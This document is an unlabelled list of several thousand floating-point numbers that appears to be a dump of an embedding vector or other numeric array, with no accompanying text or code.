-0.005155258812010288, -0.021409817039966583, 0.0008023650734685361, -0.0043141585774719715, 0.010012711398303509, -0.0031028136145323515, -0.011807594448328018, -0.019091762602329254, -0.010415151715278625, 0.021844452247023582, 0.014560285024344921, 0.03161570057272911, 0.015493946149945259, 0.018302978947758675, -0.02034737542271614, -0.027430322021245956, 0.02372787334024906, 0.01462467573583126, -0.017079560086131096, -0.006040627136826515, -0.009521734900772572, 0.016757609322667122, 0.01223418116569519, 0.008998562581837177, -0.008531731553375721, -0.0006720750825479627, -0.008020632900297642, -0.008684658445417881, -0.0014387236442416906, -0.007095020264387131, 0.0017314988654106855, 0.0008078986429609358, -0.013578331097960472, -0.0016077484469860792, 0.017288830131292343, 0.00484537985175848, 0.013562234118580818, -0.027430322021245956, 0.002354274969547987, -0.006861604750156403, 0.014230284839868546, 0.0009336611838079989, -0.0055898940190672874, 0.017546391114592552, 0.005605991464108229, 0.02078201062977314, -0.03113277070224285, -0.0041692801751196384, 0.025546902790665627, -0.004241719376295805, -0.0009814510121941566, 0.001259637763723731, 0.012548084370791912, -0.035929858684539795, -0.008237950503826141, -0.0012908268254250288, -0.022327380254864693, -0.017642976716160774, 0.03319326415657997, -0.025353731587529182, -0.01607345975935459, 0.004116963129490614, 0.00033905584132298827, 0.0033905585296452045, -0.03319326415657997, -0.0017244560876861215, -0.04835721105337143, 0.011179788038134575, 0.007054776418954134, -0.05469966679811478, 0.028074225410819054, -0.015131750144064426, -0.028476666659116745, -0.012676865793764591, 0.01968737319111824, 0.001072503044269979, 0.024387873709201813, -0.028814716264605522, 0.01414174772799015, -0.007505509071052074, 0.003372448729351163, 0.017127852886915207, -0.02604592777788639, -0.01946200616657734, -0.0031108625698834658, -0.001619821647182107, 0.007002458907663822, -0.05952895060181618, -0.001780797727406025, -0.02187664806842804, 0.0010865884833037853, -0.009159537963569164, -0.01175125315785408, 0.021055670455098152, -0.003302021650597453, -0.01021393109112978, 0.023566896095871925, -0.017820050939917564, -0.022955186665058136, 0.0014860103838145733, -0.0032215334940701723, -0.017111755907535553, -0.012000765651464462, 0.018995175138115883, -0.04784208908677101, 0.013489794917404652, 0.012531986460089684, -0.03306448459625244, -0.005883675068616867, -0.019478105008602142, 0.003179277293384075, 0.001275735325179994, 0.007565875072032213, -0.0014447602443397045, 0.00990807730704546, 0.0005946053424850106, -0.012346864677965641, 0.006849531549960375, -0.02792934700846672, 0.025047875940799713, 0.009714906103909016, -0.004310134332627058, -0.04043718799948692, 0.013779551722109318, -0.0014346991665661335, 0.009642466902732849, -0.028299592435359955, -0.026899101212620735, 0.0024307386483997107, -0.04178938642144203, -0.015341019257903099, -0.04063035920262337, -0.005517454817891121, -0.0029659841675311327, 0.006330383941531181, 0.028219105675816536, 0.01653224229812622, 0.034835219383239746, -0.010471493005752563, 0.012701012194156647, -0.0273981261998415, -0.0010865884833037853, 0.006398798897862434, -0.0326620452105999, 0.016628827899694443, 0.021071767434477806, -0.010793445631861687, -0.017353219911456108, 0.01569516584277153, 0.001388418604619801, 0.014938578940927982, -0.06548506766557693, -0.008475390262901783, 0.0014890286838635802, -0.048164039850234985, -0.02902398444712162, -0.006684531457722187, -0.01233881525695324, -0.025981537997722626, -0.026995686814188957, 0.008237950503826141, -0.013449550606310368, -0.006024529226124287, 0.010881981812417507, -0.014978823252022266, 0.0035736686550080776, 0.0020303106866776943, 0.0009960393654182553, 0.011654667556285858, -0.017160048708319664, 0.011847838759422302, -0.013771502301096916, -0.000119160016765818, 0.002831166610121727, 0.015840044245123863, -0.01505931094288826, -0.006974288262426853, 0.001275735325179994, 0.009087098762392998, 0.014334918931126595, -0.02932984009385109, -0.04375329613685608, 0.012548084370791912, -0.013827844522893429, -0.01289418339729309, -0.018480053171515465, 0.013835893012583256, 0.011018811725080013, -0.03082691691815853, 0.0076986802741885185, 0.02660934440791607, 0.00039866729639470577, 0.0014819859061390162, 0.0071231909096241, -0.006990385707467794, -0.019413713365793228, -0.013224183581769466, -0.009875881485641003, -0.01409345492720604, -0.026271294802427292, -0.011839790269732475, 0.007465265225619078, -0.0023743968922644854, 0.04330256208777428, -0.016725413501262665, 0.03328984975814819, -0.010028809309005737, 0.018560539931058884, 0.002776837209239602, -0.02770398184657097, -0.030311793088912964, 0.0024267141707241535, -0.008789293467998505, 0.006793190259486437, -0.00048745566164143384, -0.010230029001832008, -0.0053162346594035625, -0.0042859879322350025, 0.025402024388313293, -0.014367113821208477, -0.022906893864274025, -0.002947874367237091, 0.02372787334024906, -0.03792596235871315, 0.016564438119530678, 0.023695677518844604, 0.01560662966221571, -0.014149796217679977, -0.011928326450288296, 0.024935193359851837, -0.020894693210721016, -0.013014915399253368, -0.012644669972360134, -0.019961033016443253, -0.017288830131292343, -0.017691269516944885, -0.03185716271400452, 0.0030746429692953825, -0.008893927559256554, 0.03612302988767624, -0.029362034052610397, -0.012282473966479301, 0.016596632078289986, 0.015984924510121346, 0.009207830764353275, 0.017160048708319664, -0.014455650933086872, -0.011799545958638191, -0.008467340841889381, -0.005424893461167812, -0.0020313167478889227, -0.0024307386483997107, -0.02841227687895298, -0.015751508995890617, 0.012596377171576023, -0.027108369395136833, -0.02714056521654129, 0.03354741260409355, 0.004310134332627058, 0.03034398891031742, -0.0008345603127963841, -0.017739562317728996, -0.017417609691619873, -0.03657376393675804, -0.005630137864500284, -0.02197323366999626, -0.00349116837605834, 0.0024750069715082645, 0.01050368882715702, -0.014085406437516212, 0.028267398476600647, -0.017111755907535553, -0.005412820260971785, 0.01973566599190235, -0.0026239098515361547, -0.004857453051954508, 0.004652208182960749, -0.03650937229394913, 0.04752013459801674, 0.003205436049029231, -0.0016892426647245884, -0.0018673223676159978, -0.005074770655483007, -0.02025078982114792, -0.05341186001896858, -0.01299881748855114, 0.01823858916759491, 0.010640517808496952, -0.014882237650454044, 0.03663815185427666, 0.015445653349161148, 0.00042180760647170246, -0.0012063144240528345, -0.01321613509207964, -0.025804463773965836, -0.019397616386413574, 0.0009291337337344885, -0.009988564997911453, -0.003939889371395111, 0.01032661460340023, -0.002199335489422083, 0.001204302185215056, -0.006040627136826515, 0.028863009065389633, 0.013336867094039917, 0.00371049833483994, -0.019317127764225006, 0.008668561466038227, 0.006479286588728428, 0.02902398444712162, -0.019107859581708908, -0.005662333220243454, 0.015397360548377037, 0.02485470473766327, 0.007074898108839989, -0.014109552837908268, -0.004100865218788385, -0.009352709166705608, 0.0030263501685112715, -0.017160048708319664, -0.014399309642612934, -0.018995175138115883, -0.005726723466068506, 0.029313741251826286, 0.02301957830786705, 0.025273242965340614, -0.05453869327902794, -0.03576888144016266, -0.004129036329686642, 0.0014930530451238155, -0.005223673302680254, 0.024870801717042923, 0.005497332662343979, 0.001046344405040145, 0.01955859176814556, -0.005541601218283176, 0.035801079124212265, -0.020009325817227364, 0.02025078982114792, -0.001980005530640483, -0.009392953477799892, -0.01661273092031479, 0.008942220360040665, 0.006563798990100622, -0.0016530229477211833, -0.019542494788765907, 0.008580024354159832, 0.0015413458459079266, -0.01348174549639225, -0.027414225041866302, -0.00973100308328867, 0.013191988691687584, -0.009602222591638565, -0.003613912733271718, 0.01801322214305401, 0.010946372523903847, 0.003917755093425512, -0.003941901493817568, 0.007022581063210964, -0.03441668301820755, 0.028959594666957855, -0.016693217679858208, -0.013988819904625416, -0.020089812576770782, -0.006551725789904594, -0.013972722925245762, 0.0026037879288196564, 0.019880544394254684, -0.05308990553021431, 0.015413458459079266, 0.0013793637044727802, -0.010833689011633396, 0.004354402422904968, -0.027027882635593414, -0.022440064698457718, -0.018270783126354218, -0.0026842758525162935, -0.0023361651692539454, -0.025901049375534058, -0.0036380591336637735, 0.022939089685678482, 0.10933494567871094, 0.05308990553021431, 0.010801494121551514, -0.004966111853718758, -0.010857835412025452, -0.0012324730632826686, -0.005086843855679035, 0.013618575409054756, 0.014761505648493767, 0.005787089467048645, 0.013240281492471695, 0.01093832403421402, 0.006958190351724625, 0.017337122932076454, -0.01955859176814556, -0.016548339277505875, -0.002096713287755847, 0.001697291387245059, 0.007187581621110439, 0.016298826783895493, 0.004165255930274725, 0.014850042760372162, 0.016854194924235344, -0.02403372712433338, 0.007074898108839989, -0.012572230771183968, 0.014954676851630211, -0.03615522384643555, 0.0017677184659987688, -0.003720559412613511, -0.01093832403421402, -0.019655177369713783, -0.009988564997911453, -0.010044906288385391, 0.016934681683778763, 0.013674916699528694, 0.01597687415778637, -0.017482001334428787, 0.012499791570007801, 0.002521287649869919, 0.0052679418586194515, -0.010648567229509354, -0.0074491677805781364, 0.0053162346594035625, -0.014536138623952866, -0.022858601063489914, 0.005119038745760918, 0.01849615015089512, -0.019606884568929672, -0.01828688196837902, -0.02942642569541931, -0.01126832515001297, 0.04278744012117386, 0.0403406023979187, -0.007437094580382109, 0.014375163242220879, -0.033772777765989304, 0.007915997877717018, 0.008451243862509727, -0.014930530451238155, 0.025450317189097404, 0.004748793784528971, 0.02941032685339451, 0.0157756544649601, 0.0032778752502053976, -0.009336612187325954, -0.019365420565009117, 0.012097351253032684, 0.0077469730749726295, 0.017659075558185577, 0.012097351253032684, 0.004306109622120857, 0.000737471622414887, -0.003497204976156354, -0.0024005556479096413, 0.041982557624578476, -0.014681017026305199, -0.013795648701488972, -0.01749809831380844, -0.001217381563037634, 0.012612475082278252, 0.017787855118513107, -0.0036923885345458984, -0.005408796016126871, 0.011300520040094852, 0.024146409705281258, -0.034835219383239746, 0.0015353092458099127, 0.005018428899347782, -0.01876980997622013, 0.01065661571919918, 0.003197387093678117, 0.014560285024344921, 0.024259094148874283, -0.022810308262705803, 0.019542494788765907, 0.00609294418245554, 0.01640346087515354, -0.0011650642845779657, 0.001568510546348989, 0.0010096217738464475, -0.009932223707437515, 0.02327713929116726, 0.02314835786819458, -0.020315179601311684, 0.0033181190956383944, 0.016805902123451233, 0.01876980997622013, 0.0031289723701775074, 0.007843558676540852, -0.001842169906012714, 0.009071001783013344, 0.02187664806842804, -0.018174197524785995, -0.01959078758955002, -0.018254686146974564, -0.0012445462634786963, 0.00929636787623167, 0.009529783390462399, -0.022826407104730606, -0.014334918931126595, 0.007803314831107855, 0.017337122932076454, -0.017369316890835762, -0.000705276383087039, 0.01157417893409729, -0.010342712514102459, -0.04243329167366028, 0.014592480845749378, 0.0135944290086627, 0.029828865081071854, 0.003094764892011881, 0.008604170754551888, -0.011550032533705235, 0.04806745424866676, -0.01304711028933525, 0.035092782229185104, -0.004241719376295805, 0.015011018142104149, 0.004475134890526533, 0.016693217679858208, 0.04117767885327339, 0.01610565558075905, 0.027462517842650414, -0.005779040977358818, -0.010729054920375347, -0.005119038745760918, 0.006724775303155184, 0.013554184697568417, -0.011292471550405025, 0.006897824350744486, 0.005449039861559868, 0.041885972023010254, 0.0460391566157341, 0.005879650823771954, 0.028959594666957855, 0.007489411626011133, -0.021297134459018707, 0.012540035881102085, 0.020508350804448128, -0.006535628344863653, 0.010149541310966015, 0.027478614822030067, 0.005485259462147951, -0.013369062915444374, 0.01831907592713833, -0.0032195213716477156, -0.05073965713381767, -0.044654760509729385, -0.038730841130018234, 0.01920444518327713, 0.011026861146092415, -0.019284933805465698, -0.015180042944848537, -0.0013602477265521884, 0.004503305535763502, -0.009505636990070343, -0.02841227687895298, -0.00031314874649979174, 0.006386725697666407, -0.007771119475364685, 0.00253134872764349, 0.0030283622909337282, 0.009087098762392998, 0.03251716494560242, -0.034352291375398636, 0.035060588270425797, 0.0012123510241508484, -0.033515218645334244, 0.00429806113243103, 0.008741000667214394, 0.013224183581769466, -0.009135391563177109, -0.004958062898367643, -0.017659075558185577, 0.006954166106879711, 0.03256545960903168, -0.007996486499905586, 0.008869781158864498, -0.022118112072348595, -0.016725413501262665, 0.014399309642612934, -0.004225621931254864, -0.00004285358954803087, 0.022037623450160027, -0.03147082030773163, 0.026496659964323044, 0.004970136098563671, 0.0058112358674407005, -0.005839406978338957, -0.013538087718188763, -0.01727273128926754, 0.0033965951297432184, 0.013626623898744583, 0.01849615015089512, 0.014342967420816422, 0.024436166509985924, -0.011839790269732475, 0.017514197155833244, 0.015075408853590488, -0.025965439155697823, 0.014616627246141434, 0.02429128810763359, 0.00951368547976017, -0.021200548857450485, -0.0058112358674407005, 0.04703720659017563, -0.0004125011619180441, -0.01744980551302433, 0.00929636787623167, -0.009111245162785053, 0.02161908522248268, 0.02319665066897869, 0.014608577825129032, -0.003521351609379053, 0.010334664024412632, -0.003120923414826393, 0.001542351907119155, 0.02319665066897869, -0.03428790345788002, 0.0010735091054812074, 0.009280269965529442, -0.014012966305017471, -0.022681528702378273, -0.0027164712082594633, -0.00028271423070691526, 0.009586124680936337, 0.0420791432261467, -0.013562234118580818, 0.01076124981045723, -0.013175890780985355, 0.012443450279533863, 0.01497077476233244, -0.005235746502876282, -0.0035454980097711086, 0.04462256655097008, -0.0017838160274550319, -0.010221980512142181, 0.02271372266113758, -0.0282834954559803, 0.00793612003326416, -0.0071070934645831585, -0.020588839426636696, -0.006942092906683683, -0.012676865793764591, 0.031808871775865555, -0.03007032908499241, -0.0051713562570512295, 0.013071256689727306, 0.007899900898337364, -0.021506402641534805, 0.015461751259863377, -0.00021279024076648057, 0.00984368659555912, -0.013562234118580818, 0.004241719376295805, -0.028702033683657646, -0.002702385652810335, -0.007082947064191103, 0.006378676742315292, 0.0090951481834054, 0.04700501263141632, 0.0019598836079239845, -0.01332881860435009, 0.0005951084312982857, 0.014584431424736977, -0.0009940272429957986, -0.008161487057805061, -0.025224950164556503, -0.0033281801734119654, -0.012958573177456856, 0.007376728113740683, -0.028524959459900856, -0.023486407473683357, 0.032645948231220245, 0.0022597014904022217, -0.026754222810268402, 0.031503017991781235, 0.012226132676005363, -0.017337122932076454, 0.0019699446856975555, -0.007948193699121475, 0.007090996019542217, 0.02998984232544899, -0.007505509071052074, 0.0009442252339795232, -0.027478614822030067, -0.012958573177456856, -0.005010379943996668, 0.022375673055648804, 0.038827426731586456, -0.017256634309887886, -0.03085911273956299, 0.005988309625536203, 0.014600529335439205, 0.03011862188577652, -0.022697625681757927, 0.011348812840878963, 0.010028809309005737, -0.009940272197127342, 0.013079305179417133, 0.024886900559067726, 0.0021309207659214735, -0.042723048478364944, 0.0068133119493722916, 0.00995637010782957, -0.009071001783013344, 0.02100737765431404, -0.023534700274467468, -0.011976619251072407, 0.013361013494431973, 0.022423965856432915, 0.002547446172684431, -0.002551470650359988, 0.024581044912338257, -0.005034526344388723, 0.004994282498955727, 0.02091079205274582, 0.005642211064696312, -0.02551470696926117, -0.04896891862154007, 0.010052955709397793, -0.023695677518844604, -0.004897696897387505, -0.007050751708447933, 0.000985475373454392, -0.0009412069339305162, 0.0011992717627435923, 0.024436166509985924, 0.019751762971282005, -0.004611964337527752, -0.007678558584302664, -0.021409817039966583, 0.007771119475364685, -0.010205882601439953, 0.015429556369781494, 0.0021852501668035984, -0.02187664806842804, -0.006451115943491459, -0.018142003566026688, 0.0016178095247596502, -0.007992462255060673, 0.005702577065676451, -0.006402823142707348, -0.008885879069566727, 0.019977129995822906, -0.014962725341320038, -0.013352965004742146, -0.023293236270546913, -0.03612302988767624, -0.0015514068072661757, 0.0034126925747841597, -0.024806411936879158, 0.004648183938115835, 0.0030102524906396866, 0.025482511147856712, 0.008861732669174671, -0.0013350952649489045, -0.003720559412613511, 0.015598581172525883, 0.004664281383156776, -0.011453446932137012, 0.013530038297176361, 0.008314413949847221, -0.031503017991781235, -0.02152249962091446, -0.02121664583683014, 0.02973227947950363, -0.009497587569057941, -0.026512758806347847, 0.005094892345368862, 0.0011067105224356055, -0.03248497098684311, 0.038247913122177124, -0.020202497020363808, 0.002316043246537447, 0.0021470182109624147, 0.020443961024284363, -0.04153182730078697, 0.01060832291841507, 0.010382956825196743, 0.04323817044496536, 0.001713389065116644, 0.015228335745632648, -0.004120987374335527, 0.023180553689599037, -0.01135686133056879, -0.009900027886033058, 0.014737359248101711, 0.008443194441497326, 0.03850547596812248, -0.007843558676540852, -0.0000809910852694884, -0.0008330511627718806, -0.030504964292049408, 0.007634290028363466, 0.004088792018592358, -0.0034891562536358833, -0.005919895134866238, 0.014012966305017471, -0.0005181417218409479, -0.006117090582847595, -0.0047125741839408875, -0.018705418333411217, 0.018930785357952118, -0.010664664208889008, 0.004978185053914785, -0.043334756046533585, 0.008982464671134949, 0.01641150936484337, -0.004837330896407366, 0.03077862411737442, 0.006877702660858631, 0.0052196490578353405, -0.004720623139292002, -0.008499536663293839, 0.01006100419908762, -0.0015051262453198433, 0.030263500288128853, -0.004583793692290783, -0.00032320976606570184, 0.0015111628454178572, 0.009240026585757732, 0.021425914019346237, -0.0017979014664888382, -0.024838607758283615, -0.018447857350111008, 0.007437094580382109, -0.0010674725053831935, -0.012572230771183968, 0.045878179371356964, 0.003833242692053318, 0.020669328048825264, 0.013505891896784306, 0.014672968536615372, -0.004056597128510475, 0.020798107609152794, -0.0067086778581142426, -0.019928837195038795, 0.011550032533705235, 0.02271372266113758, 0.0011550033232197165, 0.026641540229320526, -0.0014457663055509329, 0.0181902963668108, 0.008258072659373283, -0.0025917147286236286, -0.008169535547494888, -0.0006529591628350317, -0.03541473671793938, 0.02950691245496273, -0.009924174286425114, -0.0008858714136295021, -0.018270783126354218, -0.009159537963569164, -0.005956114735454321, -0.010576128028333187, -0.01670931652188301, 0.003887572092935443, 0.00536050321534276, 0.01216979045420885, 0.02047615498304367, 0.002100737765431404, -0.023615188896656036, 0.0025494585279375315, 0.05019233748316765, 0.02393714152276516, 0.020621035248041153, -0.0014437540667131543, 0.030215207487344742, -0.02385665290057659, 0.0033120824955403805, -0.017820050939917564, 0.024935193359851837, -0.0019115908071398735, -0.012314668856561184, 0.0018592736450955272, 0.02683471143245697, 0.017739562317728996, -0.004986233543604612, -0.011823692359030247, -0.009038805961608887, -0.013860039412975311, -0.028090324252843857, 0.017127852886915207, -0.011928326450288296, -0.0003237128257751465, 0.005179405212402344, 0.014021015726029873, -0.01135686133056879, 0.007171483710408211, -0.000088977008999791, -0.004555622581392527, 0.005521479062736034, 0.021586891263723373, 0.0066000185906887054, 0.01392443012446165, 0.004805135540664196, -0.012837841175496578, 0.01115564163774252, 0.006430993787944317, -0.0009648503037169576, 0.014656870625913143, -0.012910280376672745, 0.012644669972360134, 0.002428726525977254, -0.019606884568929672, 0.011517837643623352, -0.016001021489501, 0.002464946126565337, 0.004418793134391308, -0.01391638070344925, -0.0024850680492818356, -0.05186649039387703, 0.0012395157245919108, 0.010141491889953613, 0.03660595789551735, -0.01501906756311655, 0.007839534431695938, -0.009875881485641003, 0.0149063840508461, -0.009256123565137386, -0.0005412820028141141, 0.015365165658295155, 0.01006100419908762, -0.03573668748140335, 0.005650260020047426, -0.02083030343055725, -0.0009009629138745368, 0.00005712763959309086, -0.010954421013593674, -0.011992717161774635, -0.01991274021565914, -0.015493946149945259, -0.0061251395381987095, 0.00995637010782957, -0.00371049833483994, -0.013900283724069595, -0.015687117353081703, -0.005223673302680254, -0.017047366127371788, 0.007336484268307686, 0.01696687750518322, 0.02902398444712162, 0.0029418375343084335, 0.0005382637027651072, 0.010495639406144619, 0.008620268665254116, -0.008781244978308678, -0.009344660677015781, -0.000563919311389327, -0.013602477498352528, 0.01168686244636774, 0.009087098762392998, 0.004354402422904968, 0.002509214449673891, -0.016564438119530678, -0.018029319122433662, 0.009521734900772572, -0.00443891528993845, 0.012129547074437141, -0.00011645612539723516, -0.0076986802741885185, -0.02551470696926117, 0.005086843855679035, -0.020975181832909584, -0.0024911046493798494, -0.002670190529897809, -0.01409345492720604, -0.009425148367881775, -0.0170956589281559, 0.0008571975631639361, -0.00041753167170099914, -0.003597815055400133, -0.006491359788924456, -0.029925450682640076, -0.015067360363900661, 0.010584176518023014, 0.009087098762392998, 0.02169957384467125, 0.0014598517445847392, 0.02034737542271614, 0.0014055223437026143, -0.014986871741712093, -0.009642466902732849, 0.002986106090247631, 0.03963230922818184, 0.003291960572823882, -0.02253665030002594, -0.019655177369713783, 0.010093199089169502, -0.01714395172894001, 0.0010443322826176882, -0.014528090134263039, 0.01082564052194357, 0.008757098577916622, 0.031760577112436295, -0.0080005107447505, -0.01658053509891033, -0.025804463773965836, 0.0008275175932794809, 0.0162263885140419, 0.007907949388027191, 0.02648056298494339, 0.0019236640073359013, 0.005517454817891121, 0.00601648073643446, -0.007791241630911827, -0.0020373533479869366, 0.002408604370430112, -0.008177584037184715, 0.005320258904248476, 0.012008815072476864, -0.004080743528902531, -0.004680379293859005, 0.009433197788894176, -0.012177839875221252, -0.001346162403933704, -0.021184450015425682, -0.0031128746923059225, -0.0005312210414558649, -0.015357117168605328, 0.023969337344169617, -0.005263917613774538, -0.00635855458676815, -0.01361052691936493, -0.01072100643068552, 0.0038573890924453735, -0.005312210414558649, 0.0011147592449560761, 0.012918329797685146, -0.0029679962899535894, 0.005481235217303038, 0.003636047011241317, 0.0015061323065310717, -0.008338560350239277, -0.020202497020363808, -0.00951368547976017, 0.01391638070344925, 0.026722026988863945, 0.025852756574749947, -0.0035958029329776764, 0.014004917815327644, 0.009763198904693127, 0.012620523571968079, 0.009972467087209225, -0.004394646733999252, -0.0017204317264258862, 0.009537831880152225, 0.022649332880973816, 0.004716598894447088, 0.020282983779907227, 0.00704672746360302, 0.0038573890924453735, 0.010101248510181904, -0.012741255573928356, -0.001704334164969623, 0.003678303211927414, -0.025224950164556503, 0.015220287255942822, -0.00693806866183877, -0.03403034061193466, 0.008378804661333561, -0.01635516807436943, -0.005501356907188892, 0.010922226123511791, 0.012008815072476864, -0.0076020946726202965, -0.005501356907188892, -0.004310134332627058, 0.0005078291869722307, -0.0009220910142175853, 0.0038352548144757748, 0.00035641106660477817, -0.00748538738116622, -0.029233254492282867, -0.0029015936888754368, 0.013409306295216084, 0.0021751890890300274, -0.014125649817287922, -0.0028110446874052286, -0.002939825411885977, -0.0031168991699814796, 0.021297134459018707, -0.0014608578057959676, 0.005622089374810457, 0.008773195557296276, 0.013626623898744583, -0.009288319386541843, -0.012346864677965641, 0.016242485493421555, -0.008213804103434086, 0.00034484092611819506, -0.002197323366999626, 0.010696860030293465, -0.004310134332627058, -0.015075408853590488, -0.00775099778547883, 0.0016308887861669064, 0.018399564549326897, -0.0000010375410965934861, 0.0018854321679100394, -0.009867832995951176, -0.035801079124212265, -0.002048420486971736, 0.01497077476233244, 0.006141236983239651, -0.010906128212809563, -0.007179532665759325, 0.002261713845655322, 0.029184961691498756, 0.00576696777716279, 0.025063972920179367, -0.019848348572850227, -0.000027510559448273852, 0.005412820260971785, -0.0029197034891694784, -0.030376184731721878, 0.00031088502146303654, -0.006020504981279373, 0.014101503416895866, 0.016677120700478554, -0.000589574861805886, -0.0031672040931880474, -0.004479159135371447, -0.003996231127530336, -0.01560662966221571, 0.003943913616240025, -0.009682710282504559, -0.0014045161660760641, -0.006237822584807873, 0.0074974605813622475, -0.0014538151444867253, 0.0058112358674407005, -0.00944929476827383, 0.007891851477324963, 0.006877702660858631, 0.00837075524032116, 0.026689833030104637, 0.00763831427320838, 0.019961033016443253, 0.003839279292151332, 0.004221597220748663, -0.011622471734881401, 0.009054903872311115, 0.007783192675560713, 0.0028090323321521282, -0.0016409497475251555, 0.0010221980046480894, -0.006925995461642742, 0.002821105532348156, 0.013827844522893429, 0.028138617053627968, -0.013095403090119362, 0.003287936095148325, -0.014383211731910706, 0.013562234118580818, -0.0018854321679100394, 0.00356159545481205, 0.017916636541485786, 0.022745918482542038, -0.0013039062032476068, -0.0004386597720440477, 0.006072822026908398, 0.009739052504301071, -0.0016017118468880653, 0.011912229470908642, 0.020266886800527573, 0.019622983410954475, -0.008644415065646172, -0.003998243249952793, -0.003732632612809539, -0.0007017550524324179, -0.0005256874719634652, 0.0010996677447110415, -0.005722699221223593, 0.0023079942911863327, 0.0007002459024079144, -0.006817336659878492, -0.007368679624050856, 0.003408668329939246, 0.009473441168665886, 0.00532830785959959, 0.010624420829117298, 0.013087354600429535, 0.01080954261124134, -0.0080005107447505, 0.015679068863391876, 0.02060493640601635, 0.021731769666075706, -0.026078123599290848, 0.012644669972360134, -0.015051262453198433, -0.013739307411015034, 0.013127597980201244, 0.011944424360990524, -0.01976786181330681, 0.015526141971349716, 0.006877702660858631, 0.024919094517827034, 0.0023904945701360703, -0.012990768998861313, 0.021586891263723373, 0.002293908968567848, 0.004434890579432249, -0.007465265225619078, -0.003623973811045289, -0.023309335112571716, -0.008020632900297642, -0.006217700429260731, 0.0018663163064047694, -0.008982464671134949, 0.0005266935913823545, -0.002464946126565337, -0.02149030566215515, 0.0000841351502458565, -0.017594683915376663, -0.03609083592891693, 0.011059056036174297, 0.018512247130274773, -0.012362961657345295, -0.004885623697191477, 0.025402024388313293, -0.007771119475364685, -0.010382956825196743, -0.008620268665254116, 0.0021228718105703592, 0.0032235458493232727, 0.000995033304207027, 0.018753711134195328, -0.015477849170565605, -0.004201475530862808, 0.0037769009359180927, -0.0011580216232687235, 0.005489283706992865, -0.009803442284464836, 0.012676865793764591, 0.001919639646075666, 0.004290012177079916, -0.002513238927349448, 0.021602988243103027, -0.0037547668907791376, 0.015759557485580444, -0.016870291903614998, -0.0002038610982708633, 0.01321613509207964, -0.01833517476916313, -0.004688427783548832, -0.010592225007712841, 0.002128908410668373, -0.016548339277505875, 0.009883930906653404, 0.010954421013593674, -0.012161741964519024, 0.0038634256925433874, 0.002145006088539958, -0.02578836679458618, 0.0012777475640177727, -0.02823520265519619, -0.009441246278584003, 0.017047366127371788, 0.0007656424422748387, 0.005593918263912201, 0.012314668856561184, -0.007674533873796463, 0.00411495054140687, -0.0011449422454461455, 0.01238710805773735, 0.012950524687767029, 0.0041692801751196384, -0.026142513379454613, 0.02516056038439274, -0.0170956589281559, 0.019011273980140686, 0.011912229470908642, 0.009851735085248947, 0.007952217943966389, -0.011791497468948364, 0.0038915963377803564, 0.01170296035706997, -0.00013016424782108516, -0.020701522007584572, 0.022037623450160027, 0.0005624101613648236, 0.01376345381140709, 0.0006132182315923274, -0.014825895428657532, -0.01113954372704029, -0.01798102632164955, 0.02187664806842804, -0.0034348268527537584, -0.0013361013261601329, 0.017208341509103775, -0.007082947064191103, 0.025723975151777267, 0.015469799749553204, 0.009384904988110065, 0.0033181190956383944, -0.018045417964458466, -0.01262857299298048, 0.01348174549639225, -0.003976108971983194, 0.005996358580887318, 0.009819540195167065, -0.002631958806887269, -0.0032859239727258682, 0.010914177633821964, 0.007706729229539633, -0.009771247394382954, -0.005634162575006485, -0.007143313065171242, 0.004523427691310644, 0.0014789676060900092, 0.018206393346190453, -0.003947937861084938, -0.022085916250944138, 0.0053926981054246426, -0.018737614154815674, -0.043334756046533585, 0.012258327566087246, -0.004153182730078697, -0.01076124981045723, 0.006072822026908398, -0.009787345305085182, -0.00775099778547883, 0.013022963888943195, 0.01435906533151865, 0.0131517443805933, 0.011775399558246136, -0.005702577065676451, 0.025707878172397614, -0.01148564275354147, -0.02103957161307335, -0.0003264795814175159, -0.012137595564126968, -0.01938151940703392, -0.005799162667244673, -0.0001613533531781286, 0.02691519819200039, 0.0026842758525162935, -0.00034936837619170547, -0.03357960656285286, 0.027720078825950623, 0.016266630962491035, 0.0034931807313114405, -0.005746845621615648, -0.007276118267327547, -0.017337122932076454, -0.0015000957064330578, 0.01604931429028511, 0.0007500478532165289, -0.011429300531744957, 0.01369906309992075, -0.010688810609281063, 0.018528345972299576, 0.020186398178339005, -0.009529783390462399, -0.0011972595239058137, 0.014672968536615372, 0.006925995461642742, 0.004881599452346563, -0.0021309207659214735, -0.027784468606114388, -0.01021393109112978, 0.01670931652188301, 0.0017385415267199278, -0.009175635874271393, -0.003191350493580103, 0.009054903872311115, 0.004479159135371447, -0.025273242965340614, -0.017900539562106133, 0.037636205554008484, -0.0016449742252007127, 0.02012200839817524, -0.013803698122501373, 0.01574345864355564, 0.013860039412975311, 0.004543549381196499, -0.02310006506741047, -0.010012711398303509, -0.010962470434606075, -0.008531731553375721, 0.009867832995951176, 0.016934681683778763, 0.012097351253032684, -0.009964418597519398, 0.01569516584277153, -0.006290140096098185, -0.007400874514132738, -0.015341019257903099, 0.016548339277505875, -0.0011318629840388894, 0.00418537762016058, 0.015212238766252995, 0.004676354583352804, -0.013940527103841305, 0.017948832362890244, 0.007348557468503714, -0.0028452519327402115, -0.029056180268526077, -0.019268834963440895, 0.015373214147984982, -0.003002203768119216, -0.03863425552845001, 0.001075521344318986, -0.017288830131292343, -0.01093832403421402, 0.003169216448441148, -0.0021892746444791555, 0.0041411095298826694, -0.008861732669174671, 0.009457344189286232, 0.014463699422776699, 0.008475390262901783, 0.006326359696686268, -0.0018210418056696653, 0.011147593148052692, 0.00027592305559664965, 0.006366603542119265, 0.017176145687699318, 0.002943849889561534, -0.0026621418073773384, -0.006616116501390934, -0.014447602443397045, -0.019317127764225006, -0.007272094022482634, -0.017385415732860565, 0.00300824036821723, 0.033869363367557526, -0.0005166325718164444, 0.0043624513782560825, -0.014560285024344921, -0.013071256689727306, -0.00037854528636671603, -0.01740151271224022, -0.007952217943966389, 0.001960889669135213, 0.007296240422874689, 0.014616627246141434, -0.006700628902763128, 0.011791497468948364, 0.001723450026474893, 0.0032295824494212866, 0.012660767883062363, 0.005002331454306841, -0.02327713929116726, 0.01740151271224022, -0.030150817707180977, 0.010737103410065174, -0.000003937940164178144, -0.006893800105899572, 0.00812526699155569, 0.0035958029329776764, 0.00944929476827383, -0.00936075858771801, 0.006628189701586962, -0.0067167263478040695, 0.0273981261998415, -0.0035937908105552197, -0.0043423292227089405, -0.0022375674452632666, 0.01584809459745884, 0.0034308023750782013, 0.02569178119301796, 0.008258072659373283, -0.000589574861805886, -0.014351016841828823, 0.006700628902763128, 0.012540035881102085, -0.004503305535763502, 0.02169957384467125, -0.00525184441357851, 